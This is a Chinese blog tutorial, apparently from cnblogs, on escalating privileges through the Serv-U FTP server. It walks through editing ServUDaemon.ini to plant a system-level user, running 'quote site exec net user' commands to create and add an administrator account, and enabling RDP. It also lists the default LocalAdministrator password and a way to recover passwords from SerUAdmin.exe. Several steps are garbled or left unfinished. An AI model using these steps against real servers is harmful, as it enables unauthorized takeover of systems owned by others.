• 第三方软件 Serv-u提权


    Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等 

     Serv-U提权分两种

    1.有修改权限

    2.无权限修改

    第一种情况时

    0.判断是否安装serv-u

    serv-u的默认端口是43958  可以用nmap 扫描确认 

    1.检查是否有可写权限

    一般安装目录 c:Program FilesServ-uSerUDaemon.ini

     打开配置文件

     2.增加用户

    在user4=添加一个系统用户

    复制一个 修改名字

    password 密码格式 是  gw+md5     我从https://www.cmd5.com/   把gw123456  加密  注意gw是他的 盐 属于密码规则   

    把加密完的密码去替换复制的密码  password=gw+md5(gw123456)

    maintenance=system   是代表系统权限  user=你命名的用户 

    cmd访问 ftp 连接  ip  输入你刚刚添加的用户密码 

    输入  

    quote site exec net user username password /add

    quote site exec net localgroup administrators username /add  

    利用ftp命令quote site exec 添加用户 加入administrators 权限组

    打开3389连接

      第二种情况无修改权限

    1.利用md5 直接去解密(ini 文件密码在ftp连)

    2.默认密码,默认用户

    账户:LocalAdministrator ,密码:#l@$ak#.lk;0@P

    命令cmd /c net user DisKill /add & net localgroup administrators DisKill /add

     3.不是默认密码时 直接把SerUAdmin.exe 下载下来 进行查看密码

     

    直接记住这里选an字符串

    . 后面就是密码  把它替换到

     

    这也叫溢出提权

    至此常用的方式都已经说了。

  • 相关阅读:
    IPC对象的持续性
    数据结构C++版-图
    数据结构C++版-树
    数据结构C++版-队列
    数据结构C++版-栈
    数据结构C++版-线性表
    转-二值图像连通域标记
    AdaBoost笔记之通俗易懂原理介绍
    AdaBoost笔记之原理
    C++之多态
  • 原文地址:https://www.cnblogs.com/feizianquan/p/10891352.html
Copyright © 2020-2023  润新知